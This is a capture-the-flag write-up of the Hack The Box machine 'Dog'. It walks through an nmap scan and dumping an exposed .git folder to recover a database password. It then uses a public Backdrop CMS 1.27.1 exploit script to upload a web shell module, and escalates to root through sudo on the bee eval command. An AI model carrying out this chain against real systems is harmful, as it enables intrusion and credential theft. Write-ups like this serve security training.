HTB - Dog

Enumeration:

# Nmap 7.95 scan initiated Fri Mar 28 13:28:37 2025 as: /usr/lib/nmap/nmap -v -p - -Pn -T4 -A -oN nmaptcp dog.htb
Nmap scan report for dog.htb (10.10.11.58)
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-title: Home | Dog
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 6.958 days (since Fri Mar 21 14:30:06 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   22.46 ms 10.10.14.1
2   22.70 ms dog.htb (10.10.11.58)

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 28 13:28:57 2025 -- 1 IP address (1 host up) scanned in 20.38 seconds

User exploit

Looking at the nmap scan, we see two open ports: 22 (SSH) and 80 (web). The web port contains a few pages of dog-related content, hosted by Backdrop CMS. The nmap scan reported a .git/ repository that we can dump and extract using GitTools.

# Download the content of the .git folder
$ bash gitdumper.sh http://dog.htb/.git/ ../dog_dmp/

# Extract the commit files from it
$ bash extractor.sh ../dog_dmp/ ../dog_ext/

This allows us to access commit 0-8204779c764abd4c9d8d95038b6d22b6a7515afa and dig around a little. The first thing of interest we come across is in settings.php, which is a mysql connection string containing a password: $database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';. We can try these credentials on the Backdrop CMS login page, but we get a (pretty informative) Sorry, unrecognized username. We can grep for htb in the recovered files to find the email tiffany@dog.htb, which allows us to log in with the previously found password.

Now that we are logged in, we can find that we are on version v1.27.1 of Backdrop CMS in the Status report page. Armed with this information, we can do a quick Google search to find Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE). This exploit follows the very common pattern amongst CMS where you can upload a malicious plugin that can execute arbitrary code. First, let’s generate the module.

$ python backdrop.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php

The URL to use to upload the module is not quite right, but we can find it easily (http://dog.htb/?q=admin/modules/install). We can click on Manual installation and then Upload a module, theme, or layout archive to install. Now unfortunately, zip files are not allowed, so we can simply add them to a tar archive instead.

$ unzip shell.zip
Archive:  shell.zip
 extracting: shell/shell.info
 extracting: shell/shell.php

$ tar -czvf shell.tar.gz shell/
shell/
shell/shell.info
shell/shell.php

We then upload our module and we receive a success message.

We can then navigate to http://dog.htb/modules/shell/shell.php and start sending commands to the server as www-data. We can look into /etc/passwd to see what users are available on the machine and we find johncusack. We can then log into SSH using this username and tiffany’s password, and get the user flag.

Root exploit

We can run sudo -l to see if we can execute anything as root on the machine.

$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

Looks like we can run Bee as root, which is a command line utility for Backdrop CMS. Looking at the help menu, we quickly spot the eval command, which allows us to execute arbitrary PHP code. Note that for this to work, we have to be in the directory where Backdrop CMS is installed (or else you will get ✘ The required bootstrap level for 'eval' is not ready.). We can use this to get the root flag.

# Change directory to the Backdrop folder
$ cd /var/www/html

# Execute PHP command using Bee
$ sudo /usr/local/bin/bee eval "shell_exec('cp /root/root.txt /tmp/dax.txt')"
$ sudo /usr/local/bin/bee eval "shell_exec('chmod 777 /tmp/dax.txt')"

Resources:

HyperlinkInfo
https://github.com/internetwache/GitToolsGitTools
https://www.exploit-db.com/exploits/52021Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
https://github.com/backdrop/backdropBackdrop CMS
https://github.com/backdrop-contrib/beeBee